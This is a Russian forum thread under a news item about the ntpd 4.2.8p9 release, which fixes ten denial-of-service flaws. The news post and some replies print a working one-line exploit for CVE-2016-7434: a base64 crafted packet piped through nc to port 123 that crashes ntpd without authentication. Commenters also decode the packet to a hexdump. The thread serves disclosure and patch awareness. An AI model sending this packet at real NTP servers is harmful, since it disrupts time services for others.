URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 109733
[ Назад ]

Исходное сообщение
"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено opennews , 24-Ноя-16 11:23

Доступен (http://www.ntp.org/downloads.html) корректирующий выпуск сервера для синхронизации точного времени NTP 4.2.8p9, в котором устранено 10 уязвимостей (http://support.ntp.org/bin/view/Main/SecurityNotice#November...), которые могут привести к отказу в обслуживании, путём исчерпания доступных ресурсов или инициирования краха процесса. Одна из уязвимостей (http://bugs.ntp.org/show_bug.cgi?id=3082) (CVE-2016-7434) достаточно проста в эксплуатации (http://dumpco.re/cve-2016-7434/) и может привести к краху процесса ntpd при отправке специально оформленного пакета без необходимости прохождения аутентификации (проблема проявляется на ранней стадии соединения):
echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\
"WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123
URL: http://www.kb.cert.org/vuls/id/633847
Новость: http://www.opennet.me/opennews/art.shtml?num=45553

Содержание

Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,freehck, 11:23 , 24-Ноя-16
- Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,burik666, 12:45 , 24-Ноя-16
  - Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,wd, 13:33 , 24-Ноя-16
    - Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,burik666, 13:59 , 24-Ноя-16
- Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,pavlinux, 03:21 , 27-Ноя-16
Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,Аноним, 16:37 , 24-Ноя-16
- Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,rt, 22:35 , 24-Ноя-16
Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,Аноним, 12:40 , 25-Ноя-16
- Выпуск ntpd 4.2.8p9 с устранением уязвимостей ,SysA, 11:37 , 28-Ноя-16

Сообщения в этом обсуждении

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено freehck , 24-Ноя-16 11:23

При копировании команды имейте в виду, что на opennet отступы для блоков кода дополнительные ставятся, что приводит к появлению пробела посреди строки. ;)
echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA="

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено burik666 , 24-Ноя-16 12:45

echo "6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP"

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено wd , 24-Ноя-16 13:33

wd ~ % echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" |base64 -d |hexdump -C
00000000  16 0a 00 10 00 00 00 00  00 00 00 36 6e 6f 6e 63  |...........6nonc|
00000010  65 2c 20 6c 61 64 64 72  3d 5b 5d 3a 48 72 61 67  |e, laddr=[]:Hrag|
00000020  73 3d 33 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  |s=32, laddr=[]:W|
00000030  4f 50 00 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  |OP.2, laddr=[]:W|
00000040  4f 50 00 00                                       |OP..|

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено burik666 , 24-Ноя-16 13:59

точно! тупанул.

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено pavlinux , 27-Ноя-16 03:21

> При копировании команды имейте в виду, что на opennet ...
UNIX-way - printf
printf "%q" "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\
    "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено Аноним , 24-Ноя-16 16:37

в этот раз на слаке апдейт завезли быстро

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено rt , 24-Ноя-16 22:35

Потрясающе!

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено Аноним , 25-Ноя-16 12:40

Gentoo, ntp 4.2.8p8 - не крашится

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Отправлено SysA , 28-Ноя-16 11:37

К сожалению ты неправ!
Крашится, но v4.2.8_p9 - нет.